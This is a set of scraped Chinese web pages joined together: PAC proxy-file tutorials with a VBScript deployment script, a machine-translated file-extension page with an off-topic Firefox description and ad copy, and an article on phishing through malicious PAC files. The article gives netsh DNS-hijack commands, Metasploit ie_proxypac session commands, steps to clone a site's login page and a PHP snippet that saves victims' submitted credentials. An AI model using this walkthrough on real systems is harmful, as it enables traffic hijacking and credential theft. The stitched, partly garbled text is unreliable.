PAC自动代理文件格式，教你如何写PAC文件
PAC自动代理文件格式，教你如何写PAC文件
&前些天，同事给我抱怨，公司的GPO强制更改了笔记本的IE代理服务器，在办公室还好，一回家就上不了网了，必须手动更改代理设置，真是麻烦。我想了想，proxy.pac自动代理文件应该可以解决这个问题，于是想到就做。
Proxy.pac文件的本质是javascript的一个函数，通过设定各种条件（域名，IP等等），从而让浏览器加载的时候自动去寻找对应的代理服务器。比如说
function FindProxyForURL(url, host) {
&&&&&&&&&&&&&& if(isInNet(myIpAddress(), &10.71.80.0&, &255.255.255.0&)){
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& return&PROXY 112.186.227.85:8080&;
&&&&&&&&&&&&&& }
&&&&&&&&&&&&&& return&DIRECT&;
当浏览器加载这个proxy.pac文件之后，就会自动比较自己的IP地址，如果属于10.71.80.0/24 这个范围，那么他就使用代理服务器112.186.227.85:8080，否则直接连接网络。
以IE为例，可以在Option-&Connection-&LAN setting 中进行设置。注意IE的格式是[url=file:///C:/proxy.pac]file://c:/proxy.pac[/url], 而在某些浏览器里面需要改成[url=file:///C:/proxy.pac]file:///c:/proxy.pac[/url]
Proxy.pac文件写好以后，就需要配置在一个共享的服务器上以供下载。我把他放在文件服务器fileserver的一个共享文件夹中，我的思路是域用户登录客户机时，自动下载proxy.pac到本地文件夹中，同时通过配置GPO中的IE选项让IE绑定该文件。
我找了一个现成的vb脚本下载，稍加改动路径以便满足自己的需要。同时因为我要把文件拷贝到C:\WINDOWS\system32\drivers\etc\，默认普通用户是没有权限访问的，我还必须更改这个文件夹的权限。
Option Explicit
Dim WshShell
Dim USERPROFILE
Dim srcPath
Dim tgtPath
Dim computername
On Error Resume Next
Set WshShell =WScript.CreateObject(&Wscript.Shell&)
Set fso =WScript.CreateObject(&Scripting.FilesystemObject&)
USERPROFILE =WshShell.ExpandEnvironmentStrings(&%USERPROFILE%&)
'Set wshShell = WScript.CreateObject(&WScript.Shell& )
'computername= wshShell.ExpandEnvironmentStrings(&%COMPUTERNAME%& )
'WScript.Echo &Computer Name: & & computername
srcPath = &\\fileserver\it\proxy\proxy.pac&
tgtPath =& &C:\WINDOWS\system32\drivers\etc\proxy.pac&
If Not fso.FileExists(tgtPath) Then
fso.CopyFile srcPath, tgtPath, True
'wscript.echo &Copy to &+tgtPath
ElseIf fso.FileExists(srcPath) Then
ReplaceIfNewer srcPath, tgtPath
Sub ReplaceIfNewer(strSourceFile, strTargetFile)
Const OVERWRITE_EXISTING = True
Dim objFso
Dim objTargetFile
Dim dtmTargetDate
Dim objSourceFile
Dim dtmSourceDate
Set objFso =WScript.CreateObject(&Scripting.FileSystemObject&)
Set objTargetFile = objFso.GetFile(strTargetFile)
dtmTargetDate = objTargetFile.DateLastModified
Set objSourceFile = objFso.GetFile(strSourceFile)
dtmSourceDate = objSourceFile.DateLastModified
If (dtmTargetDate & dtmSourceDate) Then
objFso.CopyFile objSourceFile.Path,objTargetFile.Path,OVERWRITE_EXISTING
Set objFso = Nothing
最后是GPO配置结果
一个是针对文件夹权限的，需要在用户电脑的OU配置
一个是用户的登录脚本，比较更新时间下载最新版本的proxy.pac,同时绑定IE
经测试，在我的TMG代理服务器上能够成功检测到连接的客户session。客户机访问My IP显示的也是代理服务器的公网地址。Done！&&&
PAC文件格式
PAC文件是纯文本格式的，实际上就是JavaScript文件。Chrome/Chromium的扩展Switchy!的&Auto Switch Mode&功能实际上也是创建和维护一个简单的PAC文件，但功能比较弱。
对于一般的应用，即使你几乎不懂JavaScript和编程，也可以通过本文的介绍实现基本的功能。
PAC文件FindProxyForURL函数
PAC文件中必须包含一个函数：FindProxyForURL(url, host)。
参数url是用户输入的url，参数host是url中的主机名。
比如url为，那么host就是www.truevue.org
一个最简单的PAC文件内容如下：
function FindProxyForURL(url, host) {
return &DIRECT&;
这个PAC文件实际上什么也没做，对任何URL，都将&DIRECT&（直接连网）。
PAC文件返回值类型
除了可以return &DIRECT&以外，还有两种常用方式：
http代理的主机和端口，主机也可以用IP表示
socks5代理的主机和端口，主机也可以用IP表示
那么，我们可以猜测到，用pac指定一个http代理应该这样写
function FindProxyForURL(url, host) {
return &PROXY 192.168.1.1:3128&;
甚至可以指定多个代理 &
function FindProxyForURL(url, host) {
return &DIRECT; PROXY 192.168.1.1:3128; SOCKS5 lilinux.net:1080&;
这句语句的意思是：
对所有URL，都直接连接； 如果不能直接连接，那么就使用192.168.1.1:3128这个http代理连接；如果还是不能连接，则使用lilinux.net:1080这个socks5代理连接。
使用不同连接的顺序和语句中的顺序一致，你可以根据自己的实际情况更改。
也许你明确知道哪些网站不能直连，必须用PROXY或者SOCKS5连接，那么可以对站点分别指定代理配置
function FindProxyForURL(url, host) {
if (shExpMatch(url,&*./*&)) {
return &PROXY 192.168.1.1:3128&;
if (shExpMatch(url, &*.:*/*&)) {
return &SOCKS5 lilinux.net:1080&;
if (isInNet(host, &10.0.0.0&,
&255.0.0.0&)){
return &DIRECT&;
return &DIRECT; PROXY 192.168.1.1:3128; SOCKS5 lilinux.net:1080&;
这个PAC文件中引入了两个新的函数，但从字面意思上，我们也可以猜出代码的大概意思：
当url是*./* 时，自动使用PROXY代理；当url是*.wikipedia.cm/*时，自动使用SOCKS5代理；当host是10.0.0.0 /255.0.0.0的子网内时，自动直连；如果都不匹配，则依次按DIRECT、PROXY、SOCKS5的次序尝试。
shExpMatch函数用来匹配url或者host，匹配的方式和DOS的通配符相似。例如前面用到的&*./*&可以匹配任意包含&./&的字符串。
Chrome/Chromium 的扩展Switchy!创建的pac文件还自定义了一个函数，可以用来匹配正则表达式，不过个人认为在url匹配上通常不需要使用强大的正则表达式。
isInNet函数用来返回请求的host是否在指定的域内。值得注意的是，isInNet的第二个参数必须是 IP，不能是主机名。因此需要把主机名转换成IP。比如&isInNet(host, dnsResolve(), &255.255.255.0&)&讲到这里，应该可以解决你的问题了吧。
PAC文件可以使用的JavaScript函数
当然PAC也不止这么简单，它还提供了不少其它函数，在本文就不详细讲述了。 中列出了PAC代理文件中可以使用的JavaScript函数。
你也许想把pac文件发布到Internet上，这样其它用户就只需要在浏览器中指定pac文件的url即可。你得配置你的服务器映射 .pac 文件后缀到MIME类型： application/x-ns-proxy-autoconfig 如果使用的是Netscape服务器，编辑 config 目录下的 mime.types 文 件。如果是Apache, CERN or NCSA服务器，使用 AddType 指令。
-- EOF-TRUEVUE --
29901 次阅读
我的热门文章
即使是一小步也想与你分享[转帖]用PAC文件自动配置IE代理脚本 - 放纵心情 - ITeye技术网站
博客分类：
一个PAC文件其实就是一个文本文件，最简单的格式就是包含一个叫FindProxyForURL的JScript函数，IE通过传入两个变量来调用这个函数，一个是用户浏览的地址URL全路经，一个是这个URL中的主机名部分(host)。
这个FindProxyForURL函数有三种可能的字符串返回值，
一是"DIRECT"，就是直接连接，不通过代理；
二是"PROXY proxyaddr:port"，其中proxyaddr和port分别是代理的地址和代理的端口；
三是"SOCKS socksaddr:port"，其中socksaddr和port分别是socks代理的地址和端口，
一个自动代理文件可以是多个选择的组合，其中用分号(;)隔开。
PAC内置语法见
PAC脚本另外一个重要的应用是多台代理服务器并存的情况下，通过pac脚本的控制：
&&& * 用户随机选择使用多台代理服务器中的任意一台来达到流量负载均衡的目的；
&&& * 管理员通过PAC脚本控制用户使用和不使用某台代理服务器，这样可以空出时间对代理服务器进行维护；
&&& * 让服务器工作在主备模式，当主服务器宕机时，会自动切换到其它备用服务器而不会中断服务；
&&& * 根据访问目的地的不同，自动选择最佳代理服务器。
下面列举几个PAC的实例,顺便学习下它的语法
A、isPlainHostName(host)，本例演示判断是否为本地主机，如http://myservername/的方式访问，如果是直接连接，否则使用代理
function FindProxyForURL(url, host)
if (isPlainHostName(host))
return "DIRECT";
return "PROXY proxy:80";
B、dnsDomainIs(host, "")、localHostOrDomainIs(host, "")，本例演示判断访问主机是否属于某个域和某个域名，如果属于.域的主机名，而域名不是和的直接连接，否则使用代理访问。
function FindProxyForURL(url, host)
if ((isPlainHostName(host) ||
dnsDomainIs(host, ".")) &&
!localHostOrDomainIs(host, "") &&
!localHostOrDomainIs(host, ""))
return "DIRECT";
return "PROXY proxy:80";
C、isResolvable(host)，本例演示主机名能否被dns服务器解析，如果能直接访问，否则就通过代理访问。
function FindProxyForURL(url, host)
if (isResolvable(host))
return "DIRECT";
return "PROXY proxy:80";
D、isInNet(host, "", "")，本例演示访问IP是否在某个子网内，如果是就直接访问，否则就通过代理，例子演示访问清华IP段的主页不用代理。
function FindProxyForURL(url, host)
if (isInNet(host, "166.111.0.0", "255.255.0.0"))
return "DIRECT";
return "PROXY proxy:80";
E、shExpMatch(host, "")，本例演示根据主机域名来改变连接类型，本地主机、*.edu、*.com分别用不同的连接方式。
function FindProxyForURL(url, host)
if (isPlainHostName(host))
return "DIRECT";
else if (shExpMatch(host, "*.com"))
return "PROXY comproxy:80";
else if (shExpMatch(host, "*.edu"))
return "PROXY eduproxy:80";
return "PROXY proxy:80";
F、url.substring()，本例演示根据不同的协议来选择不同的代理，http、https、ftp、gopher分别使用不同的代理。
function FindProxyForURL(url, host)
if (url.substring(0, 5) == "http:") {
return "PROXY proxy:80";
else if (url.substring(0, 4) == "ftp:") {
return "PROXY fproxy:80";
else if (url.substring(0, 7) == "gopher:") {
return "PROXY gproxy";
else if (url.substring(0, 6) == "https:") {
return "PROXY secproxy:8080";
return "DIRECT";
G、dnsResolve(host)，本例演示判断访问主机是否某个IP，如果是就使用代理，否则直接连接。
function FindProxyForURL(url, host)
if (dnsResolve(host) == "166.111.8.237") {
return "PROXY secproxy:8080";
return "PROXY proxy:80";
H、myIpAddress()，本例演示判断本地IP是否某个IP，如果是就使用代理，否则直接使用连接。
function FindProxyForURL(url, host)
if (myIpAddress() == "166.111.8.238") {
return "PROXY proxy:80";
return "DIRECT";
I、dnsDomainLevels(host)，本例演示访问主机的域名级数是几级，就是域名有几个点如果域名中有点，就通过代理访问，否则直接连接。
function FindProxyForURL(url, host)
if (dnsDomainLevels(host) & 0) { // if number of dots in host & 0
return "PROXY proxy:80";
return "DIRECT";
J、weekdayRange()，本例演示当前日期的范围来改变使用代理，如果是GMT时间周三到周六，使用代理连接，否则直接连接。
function FindProxyForURL(url, host)
if(weekdayRange("WED", "SAT", "GMT"))
return "PROXY proxy:80";
return "DIRECT";
K、最后一个例子是演示随机使用代理，这样可以好好利用代理服务器。
function FindProxyForURL(url,host)
return randomProxy();
function randomProxy()
switch( Math.floor( Math.random() * 5 ) )
return "PROXY proxy1:80";
return "PROXY proxy2:80";
return "PROXY proxy3:80";
return "PROXY proxy4:80";
return "PROXY proxy5:80";
浏览 10367
浏览: 171929 次
来自: 上海
支付宝官方在线文档中心：https://doc.open.al ...
果然是这样
lyx0224 写道强~~~~~过奖，只是总结了前人的智慧，拼 ...。PAC文件扩展名 - 什么是PAC文件类型？ | ReviverSoft
我们致力本地化我们在尽可能多的语言的网站越好，然而这一页是机器使用谷歌翻译翻译。
您尚未登录
通过Google登录
通过邮箱注册
为客户登录注册
选择一个密码。最少8个字符。
您使用的是您购买的电子邮件地址。
PAC 文件扩展名
文件扩展名查询
文件类型：
Proxy Auto-Config File
什么是一&nbsp.pac&nbsp文件？
主要用于各种Web浏览器一个合适的代理服务器的选择配置文件称为PAC文件，这就是为什么PAC文件也称为代理自动配置文件。 PAC文件，因为它们包含在界定需要选择基于给定的URL代理服务器的规则中使用的JavaScript功能被归类为网页文件。 PAC文件是非常重要的在企业环境中，其中的网站都用于业务流程，因为这些文件必须控制和负载均衡网络流量进入某个网站的能力。 Web浏览器启用PAC文件中的代理服务器连接设置发现PAC文件的URL时进入。这些文件还可以通过Web浏览器通过使用Web代理自动发现（WPAD）协议来启用。一个proxy.pac文件的Web服务器通常举办的PAC文件，当这些文件被执行时，由PAC文件返回一个包含众多的代理服务器的URL字符串。 PAC文件可以通过使用文本编辑器进行编辑，因为它们包含的JavaScript代码。
如何打开&.pac&文件？
推出&.pac&文件，或者你的电脑上的任何其他文件，双击它。如果你的文件关联的设置是否正确，这意味着应用程序来打开你的&.pac&文件将其打开。这是可能的，你可能需要下载或购买正确的应用程序。这也有可能是你有正确的应用程序在PC上，但&.pac&文件还没有与它相关联。在这种情况下，当您尝试打开一个&.pac&文件，你可以告诉Windows的应用程序是正确的该文件。从这时起，打开&.pac&文件将打开正确的应用程序。
打开一个应用程序&.pac&文件
Apple Safari
Apple Safari
Apple Safari is a type of Web browser that is integrated on most Mac computers, particularly those with operating systems Mac OS X and iOS. However, there is also a version of this Web browser found in later versions of Microsoft Windows, which are Windows 7, Windows Vista and Windows XP. Many features are found and designed on Safari, which include the following: a resizable Web search box using Yahoo!, Google or Bing, bookmark management and integration with Address book, inbuilt password management using Keychain, bookmark search with history, expandable text boxes, option to save webpage clips that are viewable on Apple Dashboard, auto-fill of Web forms, support for ICC color profile, PDF viewing, integration of iPhoto, private browsing, popup ad blocking tool, Quartz style font smoothing, spelling checker, Web feeds reading and subscription, mail integration, and support for CSS animation and CSS 3 Web fonts. Among the newest and improved features are Smart Search field, iCloud tabs, tab view and sharing of photos or posting of status to Facebook or Mail.
Mozilla Firefox
Mozilla Firefox
Mozilla Firefox is a free and open source Web browser created for Microsoft Windows, OS X, and Linux, harmonized by Mozilla Corporation and Mozilla Foundation. Firefox utilizes the Gecko layout engine to provide Web pages, which implements present and projected Web standards. The Multiple Network Graphic is stored in files with MNG format and is attach with MNG file extension and is utilized as format for graphic images animation. These are normally categorized as raster image files that symbolized PNG for Web animation. These files substituted GIF animations and make use of either lousy or lossless data compression, having the basic structure and portion as the PNG format but with a extra compound signature and larger range of portions used for animation. They contain bitmap indexed colors works in animations, slide shows, or complex still frames, composed of multiple PNG or JPEG Network Graphic (JNG) single-image data streams like PNG. The first version MNG 1.0 was introduced on Jan 31, 2001 and some of its known supporters are Gwenview, Mozilla, Netscape, Sony Ericsson and Sphere game engine.
Google Chrome
Google Chrome
Google Chrome is a web browser that was developed by Google and is being offered for free. Webkit rendering engine is being used in order to display different web pages. It allows its users to have the capability of creating shortcuts on their desktops which has the ability to launch different web applications using the browser. Users have the ability of installing different themes for Google Chrome which can be done by accessing option. Google Chrome was released in three different channels which are the Beta, Developer and Stable. A beta version was released for Android which allows its users to synchronize this with the ones that they have on their desktop in order for them to have the same browser tabs as well as bookmarks together with hardware acceleration and page pre-rendering. An iOS version was also released for Apple devices.
Microsoft Internet Explorer
Microsoft Internet Explorer
Microsoft Internet Explorer or most commonly known as Internet Explorer was developed by Microsoft in 1995. It is a graphical web browser which is included as part of the different versions of Microsoft Windows operating systems. It is one of the commonly used browsers of most Windows users. Since its first release in 1995, different versions have come out, the latest one being the Internet Explorer 10. It was designed in order to give its users the capability of viewing large range of web pages and at the same time be able to give its users features that can be used within the operating system that is installed on their computer which includes Microsoft Update. It uses the same accessibility framework which was also provided in computers that run Windows. It is also known as an interface being used when running FTP.
要小心，不要重命名扩展&nbsp.pac&nbsp文件，或任何其他文件。这不会更改文件类型。只有特殊的转换软件可以从一个文件类型更改一个文件到另一个。
什么是文件扩展名？
文件扩展名是一组三个或四个字符在文件名的末尾，在这种情况下，&nbsp.pac.&nbsp文件扩展名告诉你它是什么类型的文件，并告诉Windows哪些程序可以打开它。窗户经常关联一个默认程序的每个文件的扩展名，这样，当你双击该文件，程序会自动启动。当该程序不再是您的PC上，有时可以得到一个错误，当您试图打开相关的文件。
建议ReviverSoft
齐磊注册表会查找并修复文件扩展名错误，注册表问题，帮助迅速恢复最佳的PC性能，方便，安全。
Please enable JavaScript to view the
有关 Web Files
RapidWeaver Package
ActionScript Remote Document
Proxy Auto-Config File
Active Server Page File
PHP Source Code Files
2016 Corel Corporation或其子公司。保留所有权利。ReviverSoft 现为 Corel Corporation 的一部分。
可以立即下载！为了获得所要求的更新的最新版本，只需下载并运行 Driver Reviver.
红利: Driver Reviver 还将确定您的其他过时的驱动程序。要快速，轻松地更新它们，只需选择下载并安装它们，您会立即恢复您的电脑到最高的性能和稳定性！中国领先的IT技术网站
51CTO旗下网站
通过.PAC(自动配置代理)文件进行网络钓鱼
本文主要介绍的是Metasploit中的一个模块ie_proxypac。通过.PAC(自动配置代理)文件来完全控制IE的用户流量。只需要修改PAC文件，攻击者就能使受害者访问的某个域名指向攻击者的IP。虽然没有修改DNS但是可以达到同样的效果，且这种方式较为隐蔽。已经有很多人使用这种方式进行网络钓鱼。
作者：Evi1cg来源：乌云知识库| 10:02
0x00 常见网络钓鱼方式
攻击者进行网络钓鱼的方式常有以下几种:
1. 通过修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)来实现;
2. 通过修改受害者dns来实现;
3. 已经进入路由器，直接修改路由器的DNS。
罗列的并不全，之后遇到的话再补充，上述三种方式很常见。
修改HOSTS文件，即攻击者修改受害者HOSTS文件为如下形式：
127.0.0.1 localhost x.x.x.x
这样就受害者访问会直接访问到x.x.x.x。在msf中可以使用inject_host脚本来实现。
修改dns进行攻击：
攻击者可是使用如下命令修改受害者的dns地址(管理员身份执行)：
C:\Windows\system32&netsh interface ip show interfaces&&&&&&Idx& Met&& MTU&& 状态&&&&&&&&& 名称---& ---& -----& -----------& -------------------& 1&& 50 & connected&&& Loopback Pseudo-Interface 1&10&& 10&& 1500& connected&&& 本地连接&&&&&&C:\Windows\system32&netsh interface ip set dns &本地连接& static 192.168.1.100C:\Windows\system32&ipconfig /all | findstr 192.168.1.100&& DNS 服务器& . . . . . . . . . . . : 192.168.1.100
这样就修改了受害者的DNS地址，之后可以使用msf的 fakedns来架设dns服务器来修改域名的解析地址。
除了直接修改路由器的DNS地址的以上两种方式在某些环境下还是有一些缺点的，例如，一些牛逼的AV会检测到文件的修改而发出报警，除此之外，如果受害者所处内网环境中的防火墙或路由器拦截对外部的DNS请求，修改受害者DNS的攻击方式并不能生效(因为攻击者架设的DNS在外网环境下)。
0x01 通过PAC代理
本文主要介绍的是Metasploit中的一个模块ie_proxypac。通过.PAC(自动配置代理)文件来完全控制IE的用户流量。只需要修改PAC文件，攻击者就能使受害者访问的某个域名指向攻击者的IP。虽然没有修改DNS但是可以达到同样的效果，且这种方式较为隐蔽。已经有很多人使用这种方式进行网络钓鱼。
下面是一个PAC文件示例：
function FindProxyForURL(url, host){if (shExpMatch(host, &&)) { &return &PROXY 192.168.52.129:80; DIRECT&;}if (shExpMatch(host, &&)) { &return &PROXY 192.168.52.129:80; DIRECT&;}}
这个文件的配置是当受害者访问以及时，他会直接请求到攻击者ip( 192.168.52.129)。
详细的PAC编写请查看/pac-functions/。
将以上脚本保存为test.pac，在获取meterpreter会话的基础上使用ie_proxypac脚本:
meterpreter&&background& &[*]&Backgrounding&session&1... &msf&&use&post/windows/manage/ie_proxypac &msf&post(ie_proxypac)&&set&session&1 &session&=&1 &msf&post(ie_proxypac)&&set&REMOTE_PAC&http://192.168.52.129/test.pac &REMOTE_PAC&=&http://192.168.52.129/test.pac &msf&post(ie_proxypac)&&show&options&&&&& && &Module&options&(post/windows/manage/ie_proxypac):&&&& && &&&&Name&&&&&&&&&&&Current&Setting&&&&&&&&&Required&&Description &&&&----&&&&&&&&&&&---------------&&&&&&&&&--------&&----------- &&&&AUTO_DETECT&&&&false&&&&&&&&&&&&&&&&&&&&&&&&&&&yes&&&&&&&Automatically&detect&settings. &&&&DISABLE_PROXY&&false&&&&&&&&&&&&&&&&&&&&&&&&&&&yes&&&&&&&Disable&the&proxy&server. &&&&LOCAL_PAC&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&no&&&&&&&&Local&PAC&file. &&&&REMOTE_PAC&&&&&http://192.168.52.129/test.pac&&no&&&&&&&&Remote&PAC&file.&(Ex:&http://192.168.1.20/proxy.pac) &&&&SESSION&&&&&&&&1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&yes&&&&&&&The&session&to&run&this&module&on. &msf&post(ie_proxypac)&&exploit&&&&& && &[*]&Setting&automatic&configuration&script&from&local&PAC&file&... &[+]&Automatic&configuration&script&configured... &[*]&Post&module&execution&completed&&&&&
之后打开ie，internet选项-&连接-&局域网设置：
可以看到pac已经使用pac文件进行了代理。
代理尽量使用远程代理，因为IE11默认禁止本地代理，如果使用本地代理，代理是无效的。详情测试发现，如果连接了vpn，pac代理是失效的。
现在再访问,www.wooyun.org，会看到已经转移到了我们制定的ip：
0x02 能做什么
这里我们修改pac文件如下：
function FindProxyForURL(url, host){if (shExpMatch(host, &&)) { &return &PROXY 192.168.52.129:80; DIRECT&;}}
这里ip要改成自己的web的ip，如果受害者请求的网站host为 www.wooyun.org 时，满足规则，然后跳转到我们指定的ip地址，这里我们可以来构造钓鱼。
打开wooyun,右键查看源代码，将所有源代码保存为index.html，放在网站根目录下，因为当受害者请求 http://wooyun.org，其host为 wooyun.org 不满足代理条件，就会直接请求，所以我们把源代码中的www.wooyun.org，改为wooyun.org:
然后找到url，src，href标签，修改为http://wooyun.org/xxxx 的形式，比如
&href=&/css/style.css?v=&&rel=&stylesheet&&type=&text/css&&
&href=&http://wooyun.org/css/style.css?v=&&rel=&stylesheet&&type=&text/css&&
改完以后，基本上就算克隆成功了：
下来要把登陆页面的的源码复制过来，打开http://www.wooyun.org/user.php?action=login，右键复制源码，保存为user.php，放在网站根目录下，修改源码中的url，src，href。修改完之后，打开index.html文件，定位登录，修改href为 user.php?action=login，修改以后此标签为：
&href=&user.php?action=login&登录&|&&href=&http://wooyun.org/user.php?action=register&&class=&reg&注册&
打开user.php,定位用户登录表单，修改表单action为post.php:
&a&href=&#&&用户登录&/a&&/div& &&&&&&&&&&/div& &&form&action=&post.php&&method=&POST&&&& &.....&
在网站根目录新建post.php，添加如下代码：
&?php&$file&=&'data.txt';file_put_contents($file,&print_r($_POST,&true),&FILE_APPEND);?&&meta&http-equiv=&refresh&&content=&0;&url=http://wooyun.org/user.php?action=login&&/&&
这样钓鱼站就搭建好了。
当用户登录时：
点击登陆以后会跳转到http://wooyun.org/user.php?action=login
查看data.txt:
只是简单地一个示例，具体可以通过修改pac文件来实现控制浏览器是否进行代理。
此种方式进行网络钓鱼，做的细致的话，很难被发现，而且隐蔽性好，缺点就是连接vpn以后代理将会失效。以上是个人的测试结果，请各位大牛指正。【编辑推荐】【责任编辑： TEL：（010）】
大家都在看猜你喜欢
外电头条外电原创原创
24H热文一周话题本月最赞
讲师：50人学习过
讲师：85人学习过
讲师：851人学习过
精选博文论坛热帖下载排行
本书是根据全国计算机技术与软件专业资格（水平）考试“网络工程师级考试大纲”编写的考试辅导用书。全书主体按考试大纲的章节编排，分上、...
订阅51CTO邮刊